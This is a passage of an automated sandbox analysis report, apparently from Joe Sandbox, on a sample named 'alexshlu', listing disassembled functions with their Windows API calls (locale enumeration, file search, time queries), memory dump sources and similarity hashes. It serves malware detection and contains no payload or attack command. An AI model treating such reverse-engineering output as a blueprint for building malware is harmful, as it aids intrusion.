                                                                                                                                                                                                                                        • GetSystemTimePreciseAsFileTime.KERNEL32(?,002AE076,?,?,?,?,002AE09A,000000FF,00000000,?,?,002ADDB1,00000000,ios_base::badbit set), ref: 002AE1A8
                                                                                                                                                                                                                                        • GetSystemTimeAsFileTime.KERNEL32(?,DAA4AEFB,00000000,?,002CAC4A,000000FF,?,002AE076,?,?,?,?,002AE09A,000000FF,00000000), ref: 002AE1AC
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Time$FileSystem$Precise
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 743729956-0
                                                                                                                                                                                                                                        • Opcode ID: 436d0d52c64fce079fce57ff72694444d839bbebcc16a93deb5e1c7aa74f7b2f
                                                                                                                                                                                                                                        • Instruction ID: 81c003f1dfb9d80e1f1fb7318034d5dba96b2e702b8bddba6b038a62a75e08e5
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 436d0d52c64fce079fce57ff72694444d839bbebcc16a93deb5e1c7aa74f7b2f
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C7F06576D15568EFCB01CF44EC08B69B7A8FB09B20F11822BE81293790DF75AD008B95
                                                                                                                                                                                                                                        Function 002C458A Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,002C44E5,?,?,00000008,?,?,002CA97B,00000000), ref: 002C47B7
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ExceptionRaise
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3997070919-0
                                                                                                                                                                                                                                        • Opcode ID: f38d3371e306bf23c019b02ae75106005e1e330e6bd30cb9c01a76e08ef7f17d
                                                                                                                                                                                                                                        • Instruction ID: bbbd882fc70df162c03c5cd21e3548fb28e7bdf5a783f34b7a2ab7768d885a13
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f38d3371e306bf23c019b02ae75106005e1e330e6bd30cb9c01a76e08ef7f17d
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 02B149315206098FDB18DF28C49AB667BE0FF45364F25875CE999CF2A1C335E9A1CB40
                                                                                                                                                                                                                                        Function 002AD4DB Relevance: 1.7, APIs: 1, Instructions: 242COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 002AD4F1
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: FeaturePresentProcessor
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2325560087-0
                                                                                                                                                                                                                                        • Opcode ID: 11de5198085ae61322fc052cf3b8565c224c50f99d0544ed8c4c397ac92be17d
                                                                                                                                                                                                                                        • Instruction ID: 18bd30d6e32ffd78d8cdcf22a2a007a861f2d18299d4f2d4de4e5182b819268f
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 11de5198085ae61322fc052cf3b8565c224c50f99d0544ed8c4c397ac92be17d
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E7A17BB2D126068FDB18CF58E8996A9FBB0FB49324F24816BD426E76A0D7349C41CF50
                                                                                                                                                                                                                                        Function 002C0868 Relevance: 1.7, APIs: 1, Instructions: 199fileCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 002BBC50: RtlAllocateHeap.NTDLL(00000008,?,?,?,002BAB70,00000001,00000364,?,00000005,000000FF,?,002B3FBA,002D4C30,0000000C), ref: 002BBC91
                                                                                                                                                                                                                                        • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 002C0A09
                                                                                                                                                                                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 002C0AFD
                                                                                                                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 002C0B3C
                                                                                                                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 002C0B6F
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Find$CloseFile$AllocateFirstHeapNext
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 4087847297-0
                                                                                                                                                                                                                                        • Opcode ID: 774c9f18bf24892e74dca2dfd17946d278bb8c49ed325607d8c43187cdcfa288
                                                                                                                                                                                                                                        • Instruction ID: 0c5b96e3ab4d40d09a2a8e0e9d483c7fe37bd88d1c3cf34f5222ddb52e15944d
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 774c9f18bf24892e74dca2dfd17946d278bb8c49ed325607d8c43187cdcfa288
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 89513471920219EFEB14AF689CC5FBE77A9DF85314F1483ADF41893202EA309D618B60
                                                                                                                                                                                                                                        Function 002C0170 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 002BAB23: GetLastError.KERNEL32(?,?,002B3FBA,002D4C30,0000000C), ref: 002BAB27
                                                                                                                                                                                                                                          • Part of subcall function 002BAB23: SetLastError.KERNEL32(00000000), ref: 002BABC9
                                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 002C01C4
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ErrorLast$InfoLocale
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3736152602-0
                                                                                                                                                                                                                                        • Opcode ID: 37f469b5fad92cb844aa76c6e0498af660a5a2923cb61646a6363f373f6ba899
                                                                                                                                                                                                                                        • Instruction ID: ae6fca98778e535f503f2ce6684085e8e63498f4852a40592d7736e792da955b
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 37f469b5fad92cb844aa76c6e0498af660a5a2923cb61646a6363f373f6ba899
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E421C232A25207EBDB289F65EC86FBA73A8EF08310B10417EFD05D6141EB74ED608B51
                                                                                                                                                                                                                                        Function 002B3500 Relevance: 1.6, Strings: 1, Instructions: 333COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: 0
                                                                                                                                                                                                                                        • API String ID: 0-4108050209
                                                                                                                                                                                                                                        • Opcode ID: ea248d067a1c1e8b92a976cf0fdd4432171732eb0d467746d95ba4ed565ad266
                                                                                                                                                                                                                                        • Instruction ID: 8020812f3562b1927a0602bcf72b2182d66c5791efb330b6fd94e584772ba401
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ea248d067a1c1e8b92a976cf0fdd4432171732eb0d467746d95ba4ed565ad266
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 83C1DCB09206079FCB34CE28C584AFABBA5EF09380F644619E55297791C731EF69CB51
                                                                                                                                                                                                                                        Function 002B2101 Relevance: 1.6, Strings: 1, Instructions: 318COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: 0
                                                                                                                                                                                                                                        • API String ID: 0-4108050209
                                                                                                                                                                                                                                        • Opcode ID: 1435e98591f187588e8530518c29035e1cee23f1a38d1711ae1d84cc781aad72
                                                                                                                                                                                                                                        • Instruction ID: 9c8f3ecac85f142b0fcc63a2cd168e00019a393b5c977a23432ca016898e59ec
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1435e98591f187588e8530518c29035e1cee23f1a38d1711ae1d84cc781aad72
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7BB1D23093070BDBCB24CE6CC9556FEBBB0AF04380F144619DAA6D7692C634AD6ACB51
                                                                                                                                                                                                                                        Function 002C0290 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 002BAB23: GetLastError.KERNEL32(?,?,002B3FBA,002D4C30,0000000C), ref: 002BAB27
                                                                                                                                                                                                                                          • Part of subcall function 002BAB23: SetLastError.KERNEL32(00000000), ref: 002BABC9
                                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 002C02E4
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ErrorLast$InfoLocale
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3736152602-0
                                                                                                                                                                                                                                        • Opcode ID: bc51eafb81f395c2278a638bb9f497e5bd575704b18209e862578954ac6e35ca
                                                                                                                                                                                                                                        • Instruction ID: 9a29c96be74540dacdd0d31d54d86d8a85535697afb9ecfe0469285bc9473035
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bc51eafb81f395c2278a638bb9f497e5bd575704b18209e862578954ac6e35ca
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C811C632A2121B9BD718EF29DC86EBA77ACEF05354B10417EFA01D7241EB78ED108B50
                                                                                                                                                                                                                                        Function 002BFE23 Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 002BAB23: GetLastError.KERNEL32(?,?,002B3FBA,002D4C30,0000000C), ref: 002BAB27
                                                                                                                                                                                                                                          • Part of subcall function 002BAB23: SetLastError.KERNEL32(00000000), ref: 002BABC9
                                                                                                                                                                                                                                        • EnumSystemLocalesW.KERNEL32(002BFEBE,00000001,00000000,?,-00000050,?,002BFCAE,00000000,-00000002,00000000,?,00000055,?), ref: 002BFE95
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2417226690-0
                                                                                                                                                                                                                                        • Opcode ID: 6cf298aee7b29ded597465955af447126ea1801f7bb1a267e71b817ea3cd48c4
                                                                                                                                                                                                                                        • Instruction ID: 33982b01d4ea97601a80bb7c567606615b9eda06ecb782399e35c4bdf079f938
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6cf298aee7b29ded597465955af447126ea1801f7bb1a267e71b817ea3cd48c4
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 531129372103059FDB289F39D8916BAB791FF80398B14443DE54687741D371B952CB40
                                                                                                                                                                                                                                        Function 002C043D Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 002BAB23: GetLastError.KERNEL32(?,?,002B3FBA,002D4C30,0000000C), ref: 002BAB27
                                                                                                                                                                                                                                          • Part of subcall function 002BAB23: SetLastError.KERNEL32(00000000), ref: 002BABC9
                                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,002C00DA,00000000,00000000,?), ref: 002C0469
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ErrorLast$InfoLocale
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3736152602-0
                                                                                                                                                                                                                                        • Opcode ID: c6eca337af0812ee6bb85f1a3250f56b97d6587faffad7536bb4a4e7d09ce613
                                                                                                                                                                                                                                        • Instruction ID: 9b5bda1aaf143c5555c45a31fa171aab7ea1a3dd01f7f95c4d29cb908379c5a1
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c6eca337af0812ee6bb85f1a3250f56b97d6587faffad7536bb4a4e7d09ce613
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 71012B32A70112EBDB3C5B228C45FBB7768EF40364F14452DED42A3180DA70EE51D590
                                                                                                                                                                                                                                        Function 002C0111 Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 002BAB23: GetLastError.KERNEL32(?,?,002B3FBA,002D4C30,0000000C), ref: 002BAB27
                                                                                                                                                                                                                                          • Part of subcall function 002BAB23: SetLastError.KERNEL32(00000000), ref: 002BABC9
                                                                                                                                                                                                                                        • EnumSystemLocalesW.KERNEL32(002C0170,00000001,?,?,-00000050,?,002BFC76,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?), ref: 002C015B
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2417226690-0
                                                                                                                                                                                                                                        • Opcode ID: 8740ef0f61ba2c010757fb73eec22304f12eb2443cf8db44481b7d346337281c
                                                                                                                                                                                                                                        • Instruction ID: 2d6cf99f58bc7af2eab3d82fdbd3bf06e2182ad061eeb581682126eae4b577c9
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8740ef0f61ba2c010757fb73eec22304f12eb2443cf8db44481b7d346337281c
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 77F02232210305AFCB245F389CC1F6ABB91EF80768F08412DF9094B680C2F1AD428A40
                                                                                                                                                                                                                                        Function 002BBB60 Relevance: 1.5, APIs: 1, Instructions: 33COMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 002B6BF4: EnterCriticalSection.KERNEL32(?,?,002BAFB0,?,002D50C0,00000008,002BAEA2,?,?,?), ref: 002B6C03
                                                                                                                                                                                                                                        • EnumSystemLocalesW.KERNEL32(002BBB53,00000001,002D5140,0000000C,002BB4B8,-00000050), ref: 002BBB98
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1272433827-0
                                                                                                                                                                                                                                        • Opcode ID: 165005f292ef2d41ecac0aec687b271dd2ac938c21f6dff1c919e46008a00f54
                                                                                                                                                                                                                                        • Instruction ID: d6362cb7626ba100433c0dc28ad49c7e4eab6cf7360851f59a7b37fe6c63ccb8
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 165005f292ef2d41ecac0aec687b271dd2ac938c21f6dff1c919e46008a00f54
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0AF04972A11205EFDB00EFA8E856B9D77F0EB09765F10802AF411DB3A1CBB999148F80
                                                                                                                                                                                                                                        Function 002C0245 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 002BAB23: GetLastError.KERNEL32(?,?,002B3FBA,002D4C30,0000000C), ref: 002BAB27
                                                                                                                                                                                                                                          • Part of subcall function 002BAB23: SetLastError.KERNEL32(00000000), ref: 002BABC9
                                                                                                                                                                                                                                        • EnumSystemLocalesW.KERNEL32(002C0290,00000001,?,?,?,002BFCD0,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?,?), ref: 002C027C
